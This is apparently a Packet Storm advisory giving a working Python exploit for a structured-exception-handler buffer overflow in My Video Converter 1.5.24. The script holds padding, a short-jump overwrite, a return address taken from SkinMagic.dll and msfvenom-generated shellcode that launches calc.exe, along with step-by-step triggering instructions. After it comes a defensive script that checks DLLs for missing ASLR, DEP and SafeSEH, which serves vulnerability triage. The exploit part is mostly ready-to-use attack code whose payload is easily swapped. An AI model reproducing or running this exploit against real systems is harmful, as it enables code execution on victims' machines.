My Video Converter 1.5.24 Buffer Overflow

2018-08-01T00:00:00
ID PACKETSTORM:148771
Type packetstorm
Reporter Shubham Singh
Modified 2018-08-01T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
  
# Exploit Title : My Video Converter 1.5.24 - Remote Buffer Overflow   
# Discovery by : Shubham Singh  
# Known As : Spirited Wolf [Twitter: @Pwsecspirit]  
# Email : spiritedwolf@protonmail.com  
# Youtube Channel : www.youtube.com/c/Pentestingwithspirit   
# Discovey Date : 29/07/2018  
# Software Link : http://www.divxtodvd.net/my_video_converter.exe  
# Tested Version : 1.5.24  
# Tested on OS : Windows XP Service Pack 3 x86  
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt".  
# Just copy the text inside "exploit.txt" and start the My Video Converter 1.5.24 program and click on "Register".  
# In the third field i.e "Enter User Name" paste the content of "exploit.txt" and click on "OK". You will see a sweet calculator poped up.  
# Greetz : @FuzzySec @LiveOverflow @hexachordanu  
  
buffer = "\x41" * 996  
#Short Jump address  
nseh = "\xeb\x10\x90\x90"   
#0x1002434b : pop ebp # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files\My Video Converter\SkinMagic.dll)  
seh= "\x4B\x43\x02\x10"   
nops = "\x90" * 16  
  
#badchar \x00\x0a\x0d  
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0a\x0d' -f python  
buf = ""  
buf += "\xbf\x4d\xb3\x6b\x1e\xda\xda\xd9\x74\x24\xf4\x58\x33"  
buf += "\xc9\xb1\x31\x31\x78\x13\x83\xe8\xfc\x03\x78\x42\x51"  
buf += "\x9e\xe2\xb4\x17\x61\x1b\x44\x78\xeb\xfe\x75\xb8\x8f"  
buf += "\x8b\x25\x08\xdb\xde\xc9\xe3\x89\xca\x5a\x81\x05\xfc"  
buf += "\xeb\x2c\x70\x33\xec\x1d\x40\x52\x6e\x5c\x95\xb4\x4f"  
buf += "\xaf\xe8\xb5\x88\xd2\x01\xe7\x41\x98\xb4\x18\xe6\xd4"  
buf += "\x04\x92\xb4\xf9\x0c\x47\x0c\xfb\x3d\xd6\x07\xa2\x9d"  
buf += "\xd8\xc4\xde\x97\xc2\x09\xda\x6e\x78\xf9\x90\x70\xa8"  
buf += "\x30\x58\xde\x95\xfd\xab\x1e\xd1\x39\x54\x55\x2b\x3a"  
buf += "\xe9\x6e\xe8\x41\x35\xfa\xeb\xe1\xbe\x5c\xd0\x10\x12"  
buf += "\x3a\x93\x1e\xdf\x48\xfb\x02\xde\x9d\x77\x3e\x6b\x20"  
buf += "\x58\xb7\x2f\x07\x7c\x9c\xf4\x26\x25\x78\x5a\x56\x35"  
buf += "\x23\x03\xf2\x3d\xc9\x50\x8f\x1f\x87\xa7\x1d\x1a\xe5"  
buf += "\xa8\x1d\x25\x59\xc1\x2c\xae\x36\x96\xb0\x65\x73\x68"  
buf += "\xfb\x24\xd5\xe1\xa2\xbc\x64\x6c\x55\x6b\xaa\x89\xd6"  
buf += "\x9e\x52\x6e\xc6\xea\x57\x2a\x40\x06\x25\x23\x25\x28"  
buf += "\x9a\x44\x6c\x4b\x7d\xd7\xec\xa2\x18\x5f\x96\xba"  
exploit = buffer + nseh + seh + nops + buf + "C" * (1000 - len(buffer) - 8 - len(nops) - len(buf))  
f = open ("exploit.txt", "w")  
f.write(exploit)  
f.close()  
  
`
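The SEH-overwrite technique above only works because the module it borrows its `pop pop ret` from, SkinMagic.dll, was built without ASLR and without SafeSEH, as the comment in the script records. The following is an added example, not part of the advisory or of the vendor's code: a small PE header inspector that reports which of those mitigations a DLL opts into, so a defender triaging a product can find unprotected modules before an attacker does. It parses the `DllCharacteristics` flags and the load-config data directory directly with `struct`; the presence of a load-config directory is used as a proxy for a SafeSEH handler table (an assumption made here; a full check would read `SEHandlerTable` inside that directory). `build_test_header` constructs a minimal in-memory PE32 header purely as a fixture, so the script runs offline without any real binary.

```python
import struct

# Flag values from the PE/COFF specification (IMAGE_DLLCHARACTERISTICS_*)
DYNAMIC_BASE = 0x0040   # image may be relocated at load time (ASLR opt-in)
NX_COMPAT    = 0x0100   # image is DEP/NX compatible
NO_SEH       = 0x0400   # image registers no SEH handlers at all
LOAD_CONFIG_DIR = 10    # data directory index holding the load config (SafeSEH table)


def mitigation_report(data):
    """Parse PE headers from raw image bytes and report mitigation opt-ins."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 24                       # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    pe32plus = magic == 0x20B
    # DllCharacteristics sits at offset 70 of the optional header for PE32 and PE32+
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    # NumberOfRvaAndSizes (and the directory array after it) is 16 bytes later in PE32+
    nrva_off = opt + (108 if pe32plus else 92)
    nrva = struct.unpack_from("<I", data, nrva_off)[0]
    dirs = nrva_off + 4
    load_cfg_size = 0
    if nrva > LOAD_CONFIG_DIR:
        _, load_cfg_size = struct.unpack_from("<II", data, dirs + 8 * LOAD_CONFIG_DIR)
    return {
        "pe32plus": pe32plus,
        "aslr": bool(dll_chars & DYNAMIC_BASE),
        "dep": bool(dll_chars & NX_COMPAT),
        "no_seh": bool(dll_chars & NO_SEH),
        # assumption: a load-config directory stands in for a SafeSEH handler table
        "safeseh_table": load_cfg_size > 0,
    }


def missing_mitigations(report):
    """List the mitigations whose absence makes a module usable for an SEH overwrite."""
    missing = []
    if not report["aslr"]:
        missing.append("ASLR")
    if not report["dep"]:
        missing.append("DEP")
    if not (report["no_seh"] or report["safeseh_table"]):
        missing.append("SafeSEH")
    return missing


def build_test_header(dll_chars, load_cfg_size):
    """Construct a minimal PE32 header in memory (test fixture, not a real module)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                 # e_lfanew = 64
    # i386, no sections, 224-byte optional header, Characteristics = executable DLL
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    rva = 0x1000 if load_cfg_size else 0
    struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG_DIR, rva, load_cfg_size)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # An unprotected module, like the one the advisory's SEH address is taken from
    legacy = mitigation_report(build_test_header(0, 0))
    print("legacy module missing:", missing_mitigations(legacy))
    # A module built with /DYNAMICBASE /NXCOMPAT /SAFESEH
    modern = mitigation_report(build_test_header(DYNAMIC_BASE | NX_COMPAT, 0x40))
    print("modern module missing:", missing_mitigations(modern))
```

To run it against a real file, read the DLL with `open(path, "rb").read()` and pass the bytes to `mitigation_report`; any module that comes back with `SafeSEH` and `ASLR` in its missing list is a candidate for exactly the kind of fixed-address `pop pop ret` the script above relies on, and should be rebuilt with those linker options or replaced.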